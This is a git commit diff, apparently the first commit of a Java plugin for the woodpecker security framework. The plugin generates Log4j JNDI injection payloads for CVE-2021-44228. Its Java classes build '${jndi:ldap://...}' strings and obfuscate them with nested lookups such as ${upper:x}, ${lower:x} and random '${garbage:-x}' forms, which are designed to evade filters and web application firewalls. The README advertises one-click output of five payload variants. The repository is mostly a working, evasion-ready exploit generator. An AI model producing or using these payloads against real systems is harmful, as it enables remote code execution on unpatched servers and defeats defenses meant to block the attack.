第一次提交

.gitignore

@@ -0,0 +1,29 @@
+# Created by .ignore support plugin (hsz.mobi)
+### Java template
+# Compiled class file
+*.class
+
+# Log file
+*.log
+
+# BlueJ files
+*.ctxt
+
+# Mobile Tools for Java (J2ME)
+.mtj.tmp/
+
+# Package Files #
+*.jar
+*.war
+*.nar
+*.ear
+*.zip
+*.tar.gz
+*.rar
+
+# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
+hs_err_pid*
+
+.idea
+.DS_Store
+*.iml

README.md

@@ -0,0 +1,13 @@
+## 0x01 简介
+`log4j-payload-generator`是 [woodpecker框架](https://github.com/woodpecker-framework/woodpecker-framwork-release/releases) 生产log4 jndi注入漏洞payload的插件。目前可以一键生产以下5类payload。
+
+1. 原始payload
+2. {[upper|lower]:x}类型随机混payload
+3. {[upper|lower]:x}全混淆payload
+4. {::-n}类型随机混淆payload
+5. {::-n}类型全混淆payload
+
+![log4j JNDI注入插件payload生成展示](./docs/log4j-payload-generator.png)
+
+## 0x02 参考
+* https://github.com/whwlsfb/Log4j2Scan

pom.xml

@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>groupId</groupId>
+    <artifactId>log4j-payload-generator</artifactId>
+    <version>1.0-SNAPSHOT</version>
+
+    <dependencies>
+        <dependency>
+            <groupId>me.gv7.woodpecker</groupId>
+            <artifactId>woodpecker-sdk</artifactId>
+            <version>0.3.0</version>
+        </dependency>
+    </dependencies>
+
+</project>

src/main/java/me/gv7/woodpecker/plugin/WoodpeckerPluginManager.java

@@ -0,0 +1,9 @@
+package me.gv7.woodpecker.plugin;
+
+import me.gv7.woodpekcer.vuldb.Log4jRCEPlugin;
+
+public class WoodpeckerPluginManager implements IPluginManager {
+    public void registerPluginManagerCallbacks(IPluginManagerCallbacks pluginManagerCallbacks) {
+        pluginManagerCallbacks.registerVulPlugin(new Log4jRCEPlugin());
+    }
+}

src/main/java/me/gv7/woodpekcer/vuldb/Log4jRCEPlugin.java

@@ -0,0 +1,83 @@
+package me.gv7.woodpekcer.vuldb;
+
+import me.gv7.woodpecker.plugin.*;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Map;
+
+public class Log4jRCEPlugin implements IVulPlugin {
+    public static IVulPluginCallbacks callbacks;
+    public static IPluginHelper pluginHelper;
+
+
+    public void VulPluginMain(IVulPluginCallbacks iVulPluginCallbacks) {
+        this.callbacks = iVulPluginCallbacks;
+        this.pluginHelper = callbacks.getPluginHelper();
+        callbacks.setVulPluginName("log4j payload generator");
+        callbacks.setVulPluginVersion("0.1.1");
+        callbacks.setVulPluginAuthor("woodpecker-org");
+        callbacks.setVulId("CVE-2021-44228");
+        callbacks.setVulCVSS(10.0);
+        callbacks.setVulName("log4j jndi inject");
+        callbacks.setVulDescription("Log4j反序列化荷载生成器");
+        callbacks.setVulCategory("jndi inject");
+        callbacks.setVulAuthor("alibaba cloud");
+        callbacks.setVulScope("2.x <= version <= 2.15.rc1");
+        callbacks.setVulDisclosureTime("2021.12.09");
+        callbacks.setVulProduct("log4j");
+        callbacks.setVulSeverity("high");
+        List<IPayloadGenerator> payloadGeneratorList = new ArrayList<IPayloadGenerator>();
+        payloadGeneratorList.add(new JNDIPayloadGenerator());
+        callbacks.registerPayloadGenerator(payloadGeneratorList);
+    }
+
+
+    public class JNDIPayloadGenerator implements IPayloadGenerator {
+
+        public String getPayloadTabCaption() {
+            return "jndi inject";
+        }
+
+        public IArgsUsageBinder getPayloadCustomArgs() {
+            IArgsUsageBinder argsUsageBinder = pluginHelper.createArgsUsageBinder();
+            List<IArg> args = new ArrayList<IArg>();
+            IArg args1 = pluginHelper.createArg();
+            args1.setName("jndi_address");
+            args1.setDefaultValue("ldap://127.0.0.1:1099/obj");
+            args1.setDescription("jndi地址");
+            args1.setRequired(true);
+            args.add(args1);
+            argsUsageBinder.setArgsList(args);
+            return argsUsageBinder;
+        }
+
+        public void generatorPayload(Map<String, Object> customArgs, IResultOutput resultOutput) throws Throwable {
+            String jndi_address = (String)customArgs.get("jndi_address");
+            String tmpPayload = String.format("jndi:%s",jndi_address);
+            StringObfuscator1 stringObfuscator1 = new StringObfuscator1();
+            StringObfuscator2 stringObfuscator2 = new StringObfuscator2();
+
+            resultOutput.successPrintln("Raw payload:");
+            String payload = String.format("${%s}",tmpPayload);
+            resultOutput.rawPrintln("\n" + payload + "\n");
+
+            resultOutput.successPrintln("{[upper|lower]:x} Random obfuscate:");
+            payload = String.format("${%s}",stringObfuscator1.obfuscateString(tmpPayload,false));
+            resultOutput.rawPrintln("\n" + payload + "\n");
+
+            resultOutput.successPrintln("{[upper|lower]:x} all the obfuscate:");
+            payload = String.format("${%s}",stringObfuscator1.obfuscateString(tmpPayload,true));
+            resultOutput.rawPrintln("\n" + payload + "\n");
+
+            resultOutput.successPrintln("{::-n} random obfuscate:");
+            payload = String.format("${%s}",stringObfuscator2.obfuscateString(tmpPayload,false));
+            resultOutput.rawPrintln("\n" + payload + "\n");
+
+            resultOutput.successPrintln("{::-n} all the obfuscate:");
+            payload = String.format("${%s}",new StringObfuscator2().obfuscateString(tmpPayload,true));
+            resultOutput.rawPrintln("\n" + payload + "\n");
+        }
+
+    }
+}

src/main/java/me/gv7/woodpekcer/vuldb/StringObfuscator1.java

@@ -0,0 +1,48 @@
+package me.gv7.woodpekcer.vuldb;
+
+public class StringObfuscator1 {
+    public String obfuscateString(String targetString,boolean isAll) {
+        char[] _chars = targetString.toCharArray();
+        StringBuilder result = new StringBuilder();
+
+        for(int i=0;i<targetString.length();i++){
+            char currentChar = _chars[i];
+
+            boolean whetherObfuscate;
+            if(isAll){//是否全部混淆
+                whetherObfuscate = true;
+            }else{
+                whetherObfuscate = Utils.GetRandomBoolean();
+            }
+
+            // 不混淆${和}
+            if(_chars[i] == '$' || _chars[i] == '{' || _chars[i] == '}'){
+                whetherObfuscate = false;
+            }
+
+            if(whetherObfuscate){
+                if(i == 0){
+                    result.append(obfuscateTopChar(currentChar));
+                }else{
+                    result.append(obfuscateChar(currentChar));
+                }
+            }else{
+                result.append(currentChar);
+            }
+        }
+
+        return result.toString();
+    }
+
+    private String obfuscateTopChar(char _char) {
+        return String.format("${upper:%s}", _char);
+    }
+
+    private String obfuscateChar(char _char) {
+        return String.format("${lower:%s}", _char);
+    }
+
+    public static void main(String[] args) {
+        System.out.println(new StringObfuscator1().obfuscateString("jndi:ldap://127.0.0.1:1664/${sys:java.runtime.version}",true));
+    }
+}

src/main/java/me/gv7/woodpekcer/vuldb/StringObfuscator2.java

@@ -0,0 +1,46 @@
+package me.gv7.woodpekcer.vuldb;
+
+public class StringObfuscator2 {
+    public String obfuscateString(String targetString,boolean isAll) {
+        char[] _chars = targetString.toCharArray();
+        StringBuilder result = new StringBuilder();
+
+        for (char _char : _chars) {
+            boolean whetherObfuscate;
+            if(isAll){//是否全部混淆
+                whetherObfuscate = true;
+            }else{
+                whetherObfuscate = Utils.GetRandomBoolean();
+            }
+
+            // 不混淆${和}
+            if(_char == '$' || _char == '{' || _char == '}'){
+                whetherObfuscate = false;
+            }
+
+
+            if (whetherObfuscate) {
+                result.append(obfuscateChar(_char));
+            } else {
+                result.append(_char);
+            }
+        }
+        return result.toString();
+    }
+
+
+    private String obfuscateChar(char _char) {
+        int garbageCount = Utils.GetRandomNumber(1, 5);
+        StringBuilder garbage = new StringBuilder();
+        for (int i = 0; i < garbageCount; i++) {
+            int garbageLength = Utils.GetRandomNumber(1, 6);
+            String garbageWord = Utils.GetRandomString(garbageLength);
+            garbage.append(garbageWord).append(":");
+        }
+        return String.format("${%s-%s}", garbage, _char);
+    }
+
+    public static void main(String[] args) {
+        System.out.println(new StringObfuscator2().obfuscateString("jndi:ldap://127.0.0.1:1664/okkk",true));
+    }
+}

src/main/java/me/gv7/woodpekcer/vuldb/Utils.java

@@ -0,0 +1,25 @@
+package me.gv7.woodpekcer.vuldb;
+
+import java.util.Random;
+
+public class Utils {
+    private static Random rand = new Random();
+
+    public static int GetRandomNumber(int min, int max) {
+        return rand.nextInt(max - min + 1) + min;
+    }
+
+    public static Boolean GetRandomBoolean() {
+        return rand.nextInt(100) > 50;
+    }
+
+    public static String GetRandomString(int length) {
+        String str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+        StringBuffer sb = new StringBuffer();
+        for (int i = 0; i < length; i++) {
+            int number = rand.nextInt(str.length() - 1);
+            sb.append(str.charAt(number));
+        }
+        return sb.toString();
+    }
+}